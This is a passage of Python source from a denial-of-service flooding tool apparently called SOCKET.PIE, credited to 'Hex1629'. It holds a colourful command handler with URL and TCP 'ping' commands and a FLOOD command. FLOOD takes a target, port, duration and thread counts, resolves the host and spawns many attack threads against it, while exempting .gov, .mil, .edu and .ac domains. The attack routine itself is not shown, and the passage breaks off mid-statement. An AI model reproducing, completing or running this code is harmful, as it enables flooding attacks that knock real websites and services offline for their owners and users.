163 | print(f"{Fore.LIGHTYELLOW_EX} __..---..__\n{Fore.YELLOW} ,-=' {Fore.RED}/ | \{Fore.YELLOW} `=-.\n{Fore.LIGHTWHITE_EX} :--..___________..--;\n{Fore.WHITE} \.,_____________,./ \n{Fore.RED} ╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐\n{Fore.LIGHTRED_EX} ╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤ \n{Fore.WHITE} ╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘\n {Fore.WHITE}[{Fore.GREEN}+{Fore.WHITE}] {Fore.WHITE}< {Fore.LIGHTGREEN_EX}TYPE {prefix_get}HELP FOR SHOW COMMAND {Fore.WHITE}> {Fore.RESET}")
164 | elif args_get[0].upper() == f"{prefix_get}EXIT":
165 | print(f"{Fore.LIGHTGREEN_EX}EXIT . . .{Fore.RESET}")
166 | try:
167 | exit()
168 | except:
169 | sys.exit()
170 | elif args_get[0].upper() == f"{prefix_get}PING_URL":
171 | if len(args_get) == 2:
172 | status_code_leak = ''
173 | try:
174 | a = time.time()
175 | url = args_get[1]
176 | req = requests.get(url)
177 | b = time.time()
178 | status_code_leak = "OK"
179 | except:
180 | c = time.time()
181 | status_code_leak = 'NO'
182 | if status_code_leak == "OK":
183 | print(f"{Fore.BLUE}STATUS_CODE{Fore.WHITE}={Fore.LIGHTBLUE_EX}{req.status_code}:{req.reason} {Fore.CYAN}REQUESTS{Fore.WHITE}={Fore.LIGHTCYAN_EX}{a} MS {Fore.YELLOW}RESPONSE{Fore.WHITE}={Fore.LIGHTYELLOW_EX}{b} MS {Fore.RED}PING{Fore.WHITE}={Fore.LIGHTRED_EX}{a-b} MS{Fore.RESET}")
184 | else:
185 | print(f"{Fore.BLUE}STATUS_CODE{Fore.WHITE}={Fore.LIGHTBLUE_EX}CAN'T CONNECT {Fore.CYAN}REQUESTS{Fore.WHITE}={Fore.LIGHTCYAN_EX}{a} MS {Fore.YELLOW}RESPONSE{Fore.WHITE}={Fore.LIGHTYELLOW_EX}NULL MS {Fore.RED}PING{Fore.WHITE}={Fore.LIGHTRED_EX}NULL MS{Fore.RESET}")
186 | else:
187 | print(f"{Fore.LIGHTRED_EX}{prefix_get}PING_URL {Fore.RED}{Fore.RESET}")
188 | print(f"{Fore.LIGHTRED_EX}HEY IF YOU DDOS/DOS TO TARGET IF STRAIGHT WEBSITE\n{Fore.YELLOW}ITS MAKE PINGER STOP IF STOP YOU CAN CLOSE PYTHON ONLY AND NEXT OPEN AGAIN (OK)\n{Fore.RED}NOT BUG YOU KNOW? | [BECAUSE I CAN'T FIX]{Fore.RESET}")
189 | elif args_get[0].upper() == f"{prefix_get}PING_TCP":
190 | if len(args_get) == 3:
191 | status_code_leak = ''
192 | ip_tar = str(args_get[1])
193 | port_tar = int(args_get[2])
194 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
195 | try:
196 | a = time.time()
197 | s.connect((ip_tar,port_tar))
198 | b = time.time()
199 | status_code_leak = "OK"
200 | except:
201 | c = time.time()
202 | status_code_leak = 'NO'
203 | s.close()
204 | if status_code_leak == "OK":
205 | print(f"{Fore.BLUE}STATUS_CODE{Fore.WHITE}={Fore.LIGHTBLUE_EX}CONNECT {Fore.CYAN}REQUESTS{Fore.WHITE}={Fore.LIGHTCYAN_EX}{a} MS {Fore.YELLOW}RESPONSE{Fore.WHITE}={Fore.LIGHTYELLOW_EX}{b} MS {Fore.RED}PING{Fore.WHITE}={Fore.LIGHTRED_EX}{a-b} MS{Fore.RESET}")
206 | else:
207 | print(f"{Fore.BLUE}STATUS_CODE{Fore.WHITE}={Fore.LIGHTBLUE_EX}CAN'T CONNECT {Fore.CYAN}REQUESTS{Fore.WHITE}={Fore.LIGHTCYAN_EX}{a} MS {Fore.YELLOW}RESPONSE{Fore.WHITE}={Fore.LIGHTYELLOW_EX}NULL MS {Fore.RED}PING{Fore.WHITE}={Fore.LIGHTRED_EX}NULL MS{Fore.RESET}")
208 | else:
209 | print(f"{Fore.LIGHTRED_EX}{prefix_get}PING_TCP {Fore.RED} {Fore.RESET}")
210 | elif args_get[0].upper() == f"{prefix_get}FLOOD":
211 | if len(args_get) == 10:
212 | data_type_loader_packet = args_get[1].upper()
213 | target_loader = args_get[2]
214 | port_loader = int(args_get[3])
215 | time_loader = time.time() + int(args_get[4])
216 | spam_loader = int(args_get[5])
217 | create_thread = int(args_get[6])
218 | booter_sent = int(args_get[7])
219 | methods_loader = args_get[8]
220 | spam_create_thread = int(args_get[9])
221 | code_leak = True
222 | host = ''
223 | ip = ''
224 | try:
225 | host = str(target_loader).replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "")
226 | if '.gov' in host or '.mil' in host or '.edu' in host or '.ac' in host:
227 | code_leak = False
228 | print(f"{Fore.GREEN}Uhh You Can't Attack This Website {Fore.WHITE}[ {Fore.YELLOW}.gov .mil .edu .ac {Fore.WHITE}] . . .{Fore.RESET}")
229 | else:
230 | ip = socket.gethostbyname(host)
231 | code_leak = True
232 | except socket.gaierror:
233 | code_leak = False
234 | print(f"{Fore.YELLOW}FAILED TO GET URL . . .{Fore.RESET}")
235 | if code_leak == True:
236 | for loader_num in range(create_thread):
237 | sys.stdout.write(f"\r {Fore.YELLOW}{loader_num} OF {create_thread} CREATE THREAD . . .{Fore.RESET}")
238 | sys.stdout.flush()
239 | for _ in range(spam_create_thread):
240 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet)).start()
241 | status_code = True
242 | if GUI_SETUP == 0:
243 | clear_text()
244 | print(f"{Fore.LIGHTCYAN_EX}Sending Packet {Fore.CYAN}HTTP FLOOD {Fore.LIGHTCYAN_EX}To Target {Fore.WHITE}!\n\n{Fore.YELLOW} ━╦━━━━━━━━━━━━━━━━━━━━━╦━\n{Fore.LIGHTYELLOW_EX}╚═══╦╩═════════════════════╩╦═══╝\n{Fore.WHITE} ━ ━ ━ {Fore.LIGHTGREEN_EX}SENDING {Fore.WHITE}━ ━ ━ \n{Fore.LIGHTRED_EX} ╔═╩═══════════════════════╩═╗\n {Fore.GREEN}Target: {target_loader}\n {Fore.GREEN}Port: {port_loader}\n {Fore.GREEN}Type: {data_type_loader_packet}\n{Fore.RED} ╚═══════════════════════════╝\n {Fore.BLUE}@DEV {Fore.WHITE}- {Fore.LIGHTBLUE_EX}Hex1629{Fore.RESET}")
245 | elif GUI_SETUP == 3:
246 | clear_text()
247 | print(f"{Fore.YELLOW} ╔━━━━━━━━━━━━━━━━━━━━━╗\n {Fore.BLUE}DEV {Fore.WHITE}━ {Fore.CYAN}HEX1629 \n{Fore.LIGHTYELLOW_EX} ╚━╦━━━━━━━━━━━━━━━━━╦━╝\n{Fore.LIGHTRED_EX}╦━━━━╩━━━━━━━━━━━━━━━━━╩━━━━╦\n {Fore.LIGHTGREEN_EX} TARGET {Fore.WHITE}━ {Fore.GREEN}{target_loader}\n {Fore.LIGHTGREEN_EX} PORT {Fore.WHITE}─ {Fore.GREEN}{port_loader}\n {Fore.LIGHTGREEN_EX}TIME {Fore.WHITE}━ {Fore.GREEN}{time_loader}\n{Fore.RED}╩━━━━━━━━━━━━━━━━━━━━━━━━━━━╩{Fore.RESET}")
248 | elif GUI_SETUP == 1:
249 | print(f"\n{Fore.MAGENTA}[{Fore.WHITE}SOCKET.PIE{Fore.MAGENTA}]{Fore.WHITE} Send {Fore.WHITE}<{Fore.GREEN}{data_type_loader_packet}{Fore.WHITE}> {Fore.WHITE}to {Fore.RED}{ip}:{port_loader}")
250 | elif GUI_SETUP == 2:
251 | print(f"\n{Fore.MAGENTA}[{Fore.WHITE}!{Fore.MAGENTA}]{Fore.WHITE} Send attack to {Fore.RED}{ip}:{port_loader} {Fore.MAGENTA}[{Fore.WHITE}!{Fore.MAGENTA}]{Fore.RESET}")
252 | else:
253 | print(f"{Fore.RED}{prefix_get}FLOOD